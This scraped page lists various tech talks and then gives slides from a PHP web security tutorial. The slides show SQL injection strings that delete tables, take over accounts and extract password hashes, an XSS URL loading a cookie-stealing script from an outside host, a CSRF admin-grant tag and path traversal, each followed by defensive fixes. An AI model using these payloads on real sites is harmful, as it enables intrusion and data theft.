With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack are secure? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend JavaScript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
When dynamic becomes static: the next step in web caching techniques (Wim Godden)
Although tools like Varnish can improve performance and scalability for static sites, when user-specific content is needed, a hit to the PHP/Ruby/Python/.Net backend is still required, causing scalability issues. We’ll look at a brand-new Nginx module which implements an ultra-fast and scalable solution to this problem, changing the way developers think about designing sites with user-specific content.
From ReactPHP to Facebook Hack's Async implementation and many more, asynchronous programming has been a 'hot' topic lately. But how well does async programming support work in PHP and what can you actually use it for in your projects? Let's look at some real-world use cases and how they leverage the power of async to do things you didn't know PHP could do.
Natural Task Scheduling Using Futures and Continuations, Ivan Čukić, Qt Devel... (Ivan Čukić)
We are used to thinking about algorithms in a procedural manner – with loops, branches and subroutines – presenting an algorithm as an easily understandable flow between its steps.
In the real world, where we need to reduce latency and forbid the blocking API calls, these flows get broken. Due to the inversion of control (IoC) required by the introduction of asynchronous APIs (Xlib vs. XCB, iostream vs. boost::asio), the code becomes an unreadable call-callback soup.
We are presenting a way of defining the algorithm flow in a procedural manner and leaving it up to the C++ compiler to generate the necessary asynchronous code.
Building a Pyramid: Symfony Testing Strategies (CiaranMcNulty)
The last few years have seen a huge adoption of testing practices, and an explosion of different testing tools, in the PHP space. The difficulties come when we have to choose which tools to use, in what combinations, and how to apply them to existing codebases.
In this talk we will look at what tools are available, what their strengths are, how to decide which set of tools to use for new or legacy projects, and when to prioritise decoupling and testability over the convenience we get from our frameworks.
There are so many interesting ways to authenticate a user: via an API token, social login, a traditional HTML form or anything else you can dream up. But until now, creating a custom authentication system in Symfony has meant a lot of files and a lot of complexity. Introducing Guard: a simple, but expandable authentication system built on top of the security component and introduced in Symfony 2.8. Want to authenticate via an API token? Great - that's just one class. Social login? Easy! Have some crazy legacy central authentication system? In this talk, we'll show you how you'd implement any of these in your application today. Don't get me wrong - you'll still need to do some work. But finally, the path will be clear and joyful.
Software development is riddled with explicit and implicit costs. Every decision you make has a cost attached to it. When you're writing code, you're making an investment, the size of which will for a long time define the costs of your future growth. In this talk you will learn how to see, understand and game some of these forces in your favour.
Beyond PHP - it's not (just) about the code (Wim Godden)
Most PHP developers focus on writing code. But creating Web applications is about much more than just writing PHP. Take a step outside the PHP cocoon and into the big PHP ecosphere to find out how small code changes can make a world of difference on servers and network. This talk is an eye-opener for developers who spend over 80% of their time coding, debugging and testing.
In 2010, I told everyone how to start unit testing Zend Framework applications. In 2011, let’s take this a step further by testing services, work flows and performance. Looking to raise the bar on quality? Let this talk be the push you need to improve your Zend Framework projects.
Mugdha and Amish from OSSCube present on PHP security at OSSCamp, organized by OSSCube, a global open source enterprise for open source solutions.
Building Modern and Secure PHP Applications – Codementor Office Hours with Be... (Arc & Codementor)
Codementor PHP expert mentor Ben Edmunds is the co-host of PHP Town Hall and author of Building Secure PHP Apps.
Ben is also the creator of Ion Auth, a simple, lightweight authentication library for CodeIgniter.
In an interactive format, Ben talked about:
Modern PHP
Latest PHP tools
SQL Injection
Password Hashing and Authentication
Other Common Hacks
https://www.codementor.io/benedmunds
https://www.codementor.io/php-tutorial/building-modern-secure-php-applications-codementor-office-hours-ben-edmunds
Using PHP as a server-side scripting language, I have created a simple user authentication module. The module can be directly implemented in a website with some minor changes to provide user signup ability in a webpage. HTML and CSS have been used for the design of the webpage, and MySQL for backend database management.
SQL Injection in action with PHP and MySQL (Pradeep Kumar)
A hands-on example of SQL injection using PHP and MySQL.
It also offers an overview of how it gets into our applications and how we can overcome SQL injection.
Who would have thought putting 140-character messages about one's life online or having a virtual farm game could ever be popular? Then again, many of us have those weird (but sometimes brilliant) ideas.
But no matter how incredible your ideas might be, getting them launched successfully takes more than writing lots of PHP code, smacking a sleek design on it and dropping it on a server.
So what does it take? Where do most ideas crash-land and how can you avoid making the same mistakes and transform your ideas into reality? We'll look at what steps are needed to make a service successful and sustainable.
With PHP 8.0 recently released and PHP 5.x still accounting for over 40% of all production environments, it's time to paint a clear picture on not just why everyone should move to 8.x, but on how to get code ready for the latest version of PHP. In this talk, we'll look at some handy tools and techniques to ease the migration.
With PHP 7.2 recently released and PHP 5.3 and 5.4 still accounting for over 40% of all production environments, it's time to paint a clear picture on not just why everyone should move to 7.0 (or preferably 7.1), but on how to get code ready for the latest version of PHP.
Using the version compatibility checker for PHP_CodeSniffer and a few simple step-by-step instructions, upgrading old code to make it compatible with the latest PHP versions becomes actually really easy. In this talk, we'll migrate an old piece of code and get rid of the demons of the past and ready for the present and future.
The time of static or dynamically generated sites is long gone. Non-stop interaction with users is the new normal. However, polling with Ajax requests is processor intensive and cumbersome. Websockets allow you to interact with users in real-time without increasing system load. We'll go through the basics and see all the different options, illustrated with live examples of how and when to use it, as well as when not to use it.
Your app lives on the network - networking for web developers (Wim Godden)
Our job might be to build web applications, but we can't build apps that rely on networking if we don't know how these networks and the big network that connects them all (this thing called the Internet) actually work.
I'll walk through the basics of networking, then dive a lot deeper (from TCP/UDP to IPv4/6, source/destination ports, sockets, DNS and even BGP).
Prepare for an eye-opener when you realize how much a typical app relies on all of these (and many more) working flawlessly... and how you can prepare your app for failure in the chain.
A practical step-by-step guide to Git, taking you through each phase of a project and explaining the use of Git at each step of the development process. Expect lots of how-to, but also some how-not-to, to avoid going down the wrong path.
UiPath Test Automation using UiPath Test Suite series, part 3 (DianaGray10)
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024 (Tobias Schneck)
As AI technology is pushing into IT, I was wondering, as an “infrastructure container Kubernetes guy”, how this fancy AI technology gets managed from an infrastructure operational view. Is it possible to apply our lovely cloud native principles as well? What benefits could both technologies bring to each other?
Let me take these questions and provide you a short journey through existing deployment models and use cases for AI software. With practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview of infrastructure requirements and technologies that could be beneficial or limiting for your AI use cases in an enterprise environment. An interactive demo will give you some insights into what approaches I already got working for real.
Generating a custom Ruby SDK for your web service or Rails API using Smithy (g2nightmarescribd)
Have you ever wanted a Ruby client API to communicate with your web service? Smithy is a protocol-agnostic language for defining services and SDKs. Smithy Ruby is an implementation of Smithy that generates a Ruby SDK using a Smithy model. In this talk, we will explore Smithy and Smithy Ruby to learn how to generate custom feature-rich SDKs that can communicate with any web service, such as a Rails JSON API.
Connector Corner: Automate dynamic content and events by pushing a button (DianaGray10)
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
12. Who am I ?
Wim Godden (@wimgtr)
Founder of Cu.be Solutions (http://cu.be)
Open Source developer since 1997
Developer of PHPCompatibility, OpenX, ...
Speaker at PHP and Open Source conferences
13. Who are you ?
Developers ?
System engineers ?
Network engineers ?
Ever had a hack ?
Through the code ?
Through the server ?
14. This tutorial
Based on 2-day training
Full stack → no Vagrant/VirtualBox required
Code samples will be provided after tutorial
Lots of links at the end → slides on Joind.in
15. My app is secure... I think
Basic stuff = known...
… or is it ?
Code is not enough
Code
Webserver
Database server
Operating system
Network
16. Disclaimer
Do not use these techniques to hack
Use the knowledge to prevent others from hacking you
17. Reasons for hackers to hack
Steal and sell your data
Use your infrastructure as a jumpstation to hack other servers
Send out lots of spam
Use your server in a botnet for DDOS attacks
Bring down your systems
…
21. SQL Injection (OWASP #1)
<?
require("header.php");
$hostname="localhost";
$sqlusername="someuser";
$sqlpassword="somepass";
$dbName="somedb";
MYSQL_CONNECT($hostname,$sqlusername,$sqlpassword) OR DIE("Unable to connect to database.");
@mysql_select_db("$dbName") or die("Unable to select database.");
$fp=fopen("content/whatever.php","r");
while (!feof($fp))
$content.=fgets($fp,2);
$res=MYSQL_DB_QUERY("somedb","select * from whatever where id=" . $_GET['id']);
for ($cnt=0;$cnt<MYSQL_NUMROWS($res);$cnt++)
{
$lst.="<LI>".MYSQL_RESULT($res,$cnt,"text")."</LI>\n";
}
$content=str_replace("<@textstring@>",$lst,$content);
print $content;
require("footer.php");
?>
22. SQL Injection (OWASP #1)
Over 15 years
Still #1 problem
Easy to exploit
Easy to automate (scan + exploit)
Often misunderstood
23. Standard SQL injection example
<?php
$query = "select * from user where email='" . $_POST['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'All is good';
} else {
echo 'Nobody home';
}
' OR '1'='1
select * from user where email='' OR '1'='1'
E-mail :
24. Standard SQL injection example
<?php
$query = "select * from user where email='" . $_POST['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'All is good';
} else {
echo 'Nobody home';
}
' OR '1'='1
select * from user where '1'='1'
E-mail :
25. Standard SQL injection example
<?php
$query = "select * from user where email='" . $_POST['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'All is good';
} else {
echo 'Nobody home';
}
' OR '1'='1
select * from user;
E-mail :
26. Typical pre-2005 site
Your mission (impossible) : secure the site !
index.php
contact.php
register.php
login.php
Once logged in :
main.php
… (all other content)
27. SQL injection – sample – lostpassword.php
<?php
$query = "select * from user where email='" . $_POST['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'Error !';
} else {
if (mysql_numrows($result) == 0) {
echo 'E-mail address not found';
} else {
$newpass = updatepassword(mysql_result($result, 0, 'email'));
mail($_POST['email'], 'New password', 'New password: ' . $newpass);
echo 'New password sent to ' . mysql_result($result, 0, 'email');
}
}
28. SQL injection – sample – lostpassword
lostpassword.php?email=whatever@me.com%27+OR+%271%27%3D%271
email=whatever@me.com' OR '1'='1
select * from user where email='whatever@me.com' OR '1'='1'
29. Worst case : data deletion
email=whatever@me.com' OR '1'='1'; delete from user where '1'='1
30. Knowing the table structure
email=whatever@me.com' AND email is NULL; --'
select * from user where email='whatever@me.com' AND email is NULL; --';
<?php
$query = "select * from user where email='" . $_GET['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'Error !';
} else {
if (mysql_numrows($result) == 0) {
echo 'Not found';
} else {
$newpass = updatepassword(mysql_result($result, 0, 'email'));
mail($_GET['email'], 'New password', 'Your new password is ' . $newpass);
echo 'Your new password was sent to ' . mysql_result($result, 0, 'email');
}
}
32. Update, retrieve password, update again
email=whatever@me.com'; UPDATE user set
email='myhackeraddress@gmail.com' where email='some-user-
we@found.com'; --';
Retrieve password for myhackeraddress@gmail.com
email=whatever@me.com'; UPDATE user set email='some-user-
we@found.com' where email='myhackeraddress@gmail.com'; --';
33. Hackers just want your data
email=whatever@me.com' OR 1=1 limit 1, 1; --';
email=whatever@me.com' OR 1=1 limit 2, 1; --';
email=whatever@me.com' OR 1=1 limit 3, 1; --';
...
34. They want ALL data (not just email addresses)
Field name Type
id int
username varchar(32)
password varchar(64)
firstname varchar(32)
lastname varchar(32)
address varchar(255)
zip varchar(8)
city varchar(32)
country varchar(3)
... ...
35. They want ALL data (not just email addresses)
Field name Contents
password hoh8asfdgih$0h3oh#hflkdsafhfsdfdsaf
address Hollywood Blvd. 32
36. They want ALL data (not just email addresses)
Field name Contents
password hoh8asfdgih$0h3oh#hflkdsafhfsdfdsaf
address Hollywood Blvd. 32|||hoh8asfdgih$0h3oh#hflkdsafhfsdfdsaf
37. They want ALL data (not just email addresses)
email=whatever@me.com'; UPDATE user set address=concat(address, '|||',
password), email='myhackeraddress@gmail.com' where email='some-user-
we@found.com'; --';
Retrieve password for myhackeraddress@gmail.com
Start scraping !
email=whatever@me.com'; UPDATE user set
password=substring_index(address, '|||', -1),
address=substring_index(address, '|||', 1), email='some-user-
we@found.com' where email='myhackeraddress@gmail.com'; --';
38. SQL Injection – much more...
Much more than logging in as a user
SQL injection possible → wide range of dangers
39. Fixing SQL injection : attempt #1
Addslashes() ?
$query = mysql_query('select * from user where id=' . addslashes($_GET['id']));
www.hack.me/id=5%20and%20sleep(10)
select * from user where id=5 and sleep(10)
What if we hit that code 100 times simultaneously ?
MySQL max_connections reached → Server unavailable
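For comparison with the addslashes() attempt, here are the same two lookups with bound parameters. This is an added example, not code from the original slides: it assumes the pdo_sqlite extension, uses a constructed in-memory table in place of the slides' MySQL user table, and the function names are hypothetical.

```php
<?php
// Added example. Constructed in-memory SQLite table standing in for the
// slides' MySQL `user` table, so the script runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// With the MySQL driver, also set PDO::ATTR_EMULATE_PREPARES to false so the
// server receives the statement text and the values separately.
$db->exec('CREATE TABLE user (id INTEGER PRIMARY KEY, email TEXT, name TEXT)');
$db->exec("INSERT INTO user (email, name) VALUES ('alice@example.com', 'Alice')");
$db->exec("INSERT INTO user (email, name) VALUES ('bob@example.com', 'Bob')");

/** Look up users by e-mail; the value is bound, never concatenated into the SQL. */
function findUserByEmail(PDO $db, $email) {
    $stmt = $db->prepare('SELECT id, email, name FROM user WHERE email = :email');
    $stmt->execute(array(':email' => $email));
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/** Look up a user by id; anything that is not a positive integer is rejected first. */
function findUserById(PDO $db, $id) {
    $id = filter_var($id, FILTER_VALIDATE_INT, array('options' => array('min_range' => 1)));
    if ($id === false) {
        return null; // "5 and sleep(10)" never reaches the database
    }
    $stmt = $db->prepare('SELECT id, email, name FROM user WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Inputs taken from the slides: as bound values they are plain strings.
$emails = array(
    'alice@example.com',
    "whatever@me.com' OR '1'='1",
    "whatever@me.com' AND email is NULL; --'",
);
foreach ($emails as $email) {
    printf("email %-45s rows: %d\n", var_export($email, true), count(findUserByEmail($db, $email)));
}
foreach (array('2', '5 and sleep(10)', '7.8') as $id) {
    $row = findUserById($db, $id);
    printf("id %-20s -> %s\n", var_export($id, true), $row === null ? 'rejected / not found' : $row['email']);
}
```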
43. Other injections
LDAP injection
Command injection (system, exec, …)
→ Use escapeshellarg() for the arguments
Eval (waaaaaaaaaah !)
…
User input → PHP → External system
If you provide the data, it's your responsibility !
If you consume the data, it's your responsibility !
44. Demo
<?php
mysql_connect('localhost', 'sqlinjection', 'password') or die('Not working');
mysql_select_db('sqlinjection');
$result = mysql_query("select * from user where email='" . $_GET['email'] . "'");
if (mysql_numrows($result) > 0) {
echo mysql_result($result, 0, 'name');
} else {
echo 'Error';
}
49. Ways to avoid session fixation/hijacking
session.use_trans_sid = 0
session.use_only_cookies = true
session.cookie_httponly = true
Change session on login using session_regenerate_id(true)
Do not share sessions between sites/subdomains
Do not accept sessions not generated by your code
Foreign session → remove the session cookie from the user
Regenerate session regularly using session_regenerate_id(true)
Use HTTPS
session.cookie_secure = true
All of the above help against session fixation AND session
hijacking !
50. XSS – Cross Site Scripting
<?php
addMessage($_GET['id'], $_GET['message']);
echo 'Thank you for submitting your message : ' . $_GET['message'];
URL : /submitMessage
http://www.our-app.com/submitMessage?id=5&message=<script>alert('Fun eh ?')</script>
51. XSS – more advanced
http://www.our-app.com/submitMessage?id=5&message=Thanks, we will be in
touch soon.<script type="text/javascript" src="http://someplace.io/i-will-get-your-
cookie.js"></script>
53. XSS : Non-persisted vs persistent
Previous examples were non-persistent : issue occurs once
Post code to exploitable bulletin board
→ Persistent
→ Can infect every user
→ If you stored it without filtering, you're responsible for escaping on
output !
54. XSS : how to avoid
Filter input, escape output
<?php
echo 'I just submitted this message : ' .
htmlentities($_GET['message'], ENT_QUOTES, 'UTF-8', false);
55. CSRF : Cross Site Request Forgery
www.our-app.com
1. Submit article for review
2. Retrieve article for review
3. Evil html or js makes call
4. Devil uses extra privileges
Here's the article you were asking for.
<img src="http://www.our-app.com/userSave.php?username=Devil&admin=1" />
56. CSRF : ways to avoid
Escape the output (where did we hear that before ?)
Add a field to forms with a random hash/token for verification
upon submit
Check the referer header
<form method="post" action="userSave.php">
<input name="id" type="hidden" value="5" />
<input name="token" type="hidden" value="a4gjogaihfs8ah4gisadhfgifdgfg" />
rest of the form
</form>
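One way to generate and verify the form token described above, as an added example that is not from the original slides. It assumes PHP 7+ (random_bytes); the function names and the handleUserSave() handler are hypothetical, and the requests are constructed.

```php
<?php
// Added example. The session is passed in as an array so the script runs from
// the CLI; in a web request pass $_SESSION and $_POST instead.

/** Return the per-session token, creating it on first use. */
function csrfToken(array &$session) {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // 64 hex chars from the CSPRNG
    }
    return $session['csrf_token'];
}

/** Hidden form field carrying the token, as in the form on the slide. */
function csrfField(array &$session) {
    return '<input name="token" type="hidden" value="'
        . htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8') . '" />';
}

/** True only when the submitted token matches the one stored in the session. */
function csrfTokenIsValid(array $session, array $post) {
    return isset($session['csrf_token'], $post['token'])
        && is_string($post['token'])
        && hash_equals($session['csrf_token'], $post['token']); // constant-time compare
}

/** Hypothetical userSave.php handler: state changes only via POST with a valid token. */
function handleUserSave($method, array $session, array $post) {
    if ($method !== 'POST') {
        return '405 state-changing request must be POST';
    }
    if (!csrfTokenIsValid($session, $post)) {
        return '403 missing or wrong CSRF token';
    }
    return '200 saved user ' . $post['username'];
}

// Constructed requests against one logged-in session.
$session = array();
echo csrfField($session), "\n";
$token = $session['csrf_token'];

$cases = array(
    'img tag from the slide (GET, no token)' => array('GET', array()),
    'cross-site POST without token' => array('POST', array('username' => 'Devil', 'admin' => '1')),
    'cross-site POST with guessed token' => array('POST', array('username' => 'Devil', 'token' => str_repeat('a', 64))),
    'genuine form submit' => array('POST', array('username' => 'editor', 'token' => $token)),
);
foreach ($cases as $label => $case) {
    printf("%-40s %s\n", $label, handleUserSave($case[0], $session, $case[1]));
}
```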
57. General rules – input validation
Assume all data you receive as input
contains a hack attempt !
That includes data from trusted users
→ over 90% of hacks are done by employees/partners/...
Filter on disallowed characters
Check validity of
Dates
Email addresses
URLs
etc.
Input validation is not browser-side code, it's server-side code
(you can of course use browser-side code to make it look good)
58. General rules – validation or filtering ?
Validation :
Verify if the values fit a defined format
Examples :
expecting int, but received 7.8 → “error, 7.8 is not a valid integer”
expecting international phone number, but received “+32 3 844 71 89”
Filtering / sanitizing :
Enforce the defined format by converting to it
Examples :
expecting int, but received 7.8 → 8
expecting int, but received 'one' → 0
Both have (dis)advantages
59. General rules – escaping output
Doing input validation → why do you need output escaping ?
What if the data originates from
a webservice
an XML feed
…
Always escape output !
60. Clickjacking
Do you want to support our cause ? No / Sure
Do you want to delete all your Facebook friends ? Yes / No
FB button
62. Bad authentication / authorization layer
index.php
(checks cookie)
login.php
(sets cookie)
redirect
to login
main.php
redirect
to main
63. Bad authentication / authorization layer
index.php
(checks cookie)
login.php
(sets cookie)
redirect
to login
main.php
(doesn't check
cookie !)
redirect
to main
64. Bad authentication / authorization layer
Only hiding URLs on view, not restricting on action
/somewhere is visible on screen
/somewhere/admin is not visible, but is accessible
Allowing direct access to other user's data (= insecure direct
object reference)
/user/profile/id/311 is the user's profile
/user/profile/id/312 is also accessible and updateable
Allowing direct access to file downloads with guessable urls
/download/file/83291.pdf
Creating cookies :
loggedin=1
userid=312
admin=1
65. Protecting your web stack
PHP
Webserver
Database server
Mail server
Other servers
Firewalls
...
66. Protecting your web stack - PHP
Update to the latest version (5.4 = EOL, 5.5 will be EOL this
year)
Safe_mode = dead → use PHP-FPM or VMs
Register_globals = dead :-)
Suhosin patch → mostly for web hosting companies
Disable 'dangerous' PHP functions you don't need in php.ini
system
exec
passthru
'Eval' is not a function, so can not be disabled
68. Protecting your web stack – PHP code
If you allow uploads, restrict extensions. No .php, .phtml !
Don't show errors...
...and don't show exceptions, but...
…log them ! And watch your logs ;-)
If you use filenames as parameters
download.php?filename=test.pdf
Make sure you don't allow ../../../../etc/passwd
Use basename() and pathinfo() to restrict
File extensions :
Use .php
Don't use .inc, .conf, .include, ...
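The filename check from this slide (basename() and pathinfo(), plus an extension whitelist and a realpath() containment test), as an added example that is not from the original slides. resolveDownload(), the temporary directory and the sample filenames are hypothetical and constructed for the demonstration.

```php
<?php
// Added example; resolveDownload() and the directory layout are hypothetical.

/**
 * Map a user-supplied filename to a real file directly inside $baseDir.
 * Returns the absolute path, or null when the request must be refused.
 */
function resolveDownload($baseDir, $requested, array $allowedExt = array('pdf')) {
    if (!is_string($requested) || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // basename() drops any directory part; refuse the request instead of
    // silently rewriting it. Backslashes are refused as well, because
    // basename() only treats them as separators on Windows.
    if (basename($requested) !== $requested || strpos($requested, '\\') !== false) {
        return null;
    }
    // Whitelist of extensions that may be downloaded at all.
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves symlinks, so a link pointing out of $baseDir is caught here.
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0
        || !is_file($path)) {
        return null;
    }
    return $path;
}

// Constructed download directory with one allowed and one disallowed file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'downloads_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'test.pdf', "%PDF-1.4 constructed\n");
file_put_contents($dir . DIRECTORY_SEPARATOR . 'config.inc', "constructed secret\n");

$requests = array(
    'test.pdf',
    '../../../../etc/passwd',
    'config.inc',
    'sub/../test.pdf',
    "test.pdf\0.php",
    'missing.pdf',
);
foreach ($requests as $name) {
    $path = resolveDownload($dir, $name);
    printf("%-30s %s\n", json_encode($name), $path === null ? 'refused' : 'served');
}

// Clean up the constructed files.
unlink($dir . DIRECTORY_SEPARATOR . 'test.pdf');
unlink($dir . DIRECTORY_SEPARATOR . 'config.inc');
rmdir($dir);
```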
69. Detecting / blocking hack attempts from PHP
2 options :
Build your own
Use an existing system
CAPTCHA
IDS
70. Building a simple system
Add an input field that's hidden from view (bots will fill it out)
Implement a captcha
Limit number of attempts on captcha
Limit number of posts to certain URL
71. Limiting number of posts to a URL
function isUserBlocked(Memcached $memcache, $userId) {
    // Timestamps of this user's most recent submissions, newest first
    $submissions = $memcache->get('submissions_' . $userId);
    if ($memcache->getResultCode() !== Memcached::RES_SUCCESS || !is_array($submissions)) {
        $submissions = array();
    }
    $now = new DateTimeImmutable();
    if (count($submissions) == 10) {
        // The 10th most recent submission is less than an hour old: over the limit
        if (new DateTimeImmutable($submissions[9]) > $now->modify('-1 hour')) {
            return true;
        }
        unset($submissions[9]);
    }
    // Record this submission and allow it
    array_unshift($submissions, $now->format(DateTime::ATOM));
    $memcache->set('submissions_' . $userId, $submissions);
    return false;
}
72. Using an existing system
PHPIDS :
The standard IDS for PHP
More complete
Exposé :
By @enygma (Chris Cornutt)
Faster
Use the same ruleset
Provides impact value =
level of trust in data
$data = array(
'POST' => array(
'test' => 'foo',
'bar' => array(
'baz' => 'quux',
'testing' => '<script>test</script>'
)
)
);
$filters = new \Expose\FilterCollection();
$filters->load();
$logger = new \Expose\Log\Mongo();
$manager = new \Expose\Manager($filters, $logger);
$manager->run($data);
// should return 8
echo 'impact: '.$manager->getImpact()."\n";
73. Protecting your web stack – Passwords
Don't md5() → sha512, blowfish, …
Set a good password policy
Min 8 chars, min 1 number, min 1 uppercase char, …
Reasonable maximum length (> 20)
→ Hashed result is always the same length, so restricting is insecure
Try to avoid password hints
→ Email is better for recovery
Don't create your own password hashing algorithm !
Use password_hash
5.5+ : built-in
< 5.5 : ircmaxell/password-compat
75. Rehashing old passwords from md5() or sha1()
Upon login :
$stmt = $db->prepare('SELECT * FROM user where email=:email');
$stmt->execute(array(':email' => $email));
$userRow = $stmt->fetch(PDO::FETCH_ASSOC);
if ($userRow !== false) {
    $hash = $userRow['pass'];
    // Accept the password_hash() format or the legacy md5() value (strict comparison)
    if (password_verify($password, $hash) || $hash === md5($password)) {
        // password_needs_rehash will return true when presented with unknown hash
        if (password_needs_rehash($hash, PASSWORD_DEFAULT)) {
            $newhash = password_hash($password, PASSWORD_DEFAULT);
            $stmt = $db->prepare('UPDATE user SET pass=:pass WHERE email=:email');
            $stmt->bindParam(':email', $email);
            $stmt->bindParam(':pass', $newhash);
            $stmt->execute();
        }
        // Set logged in data in session here, then redirect to logged in page
    }
}
echo 'Password incorrect';
Tell users who haven't logged in for a while that their password
will expire in x days
76. 2 factor authentication
Requires an additional verification
Usually on a separate device
Can be one-time, occasional or every time
77. Log everything !
Failed login attempts
→ Lock an account after x number of failed attempts for x minutes
→ Send automated e-mail to account owner
Simultaneous login from multiple locations
Logins from different regions on same day
→ But : beware of VPNs
If possible : every action of a user
Registered user
Anonymous user (link session to IP or IPs)
Log all PHP errors
→ Every error is important
→ If an error is a bug, it should have been fixed already
80. Protecting your web stack – Webserver
Block direct access to upload directories
Allow only access to port 80 and 443 (!)
Disable phpMyAdmin (VPN only if required)
On Apache don't :
AllowOverride All
Options Indexes
Block access to .svn and .git
Block access to composer.lock, composer.json, …
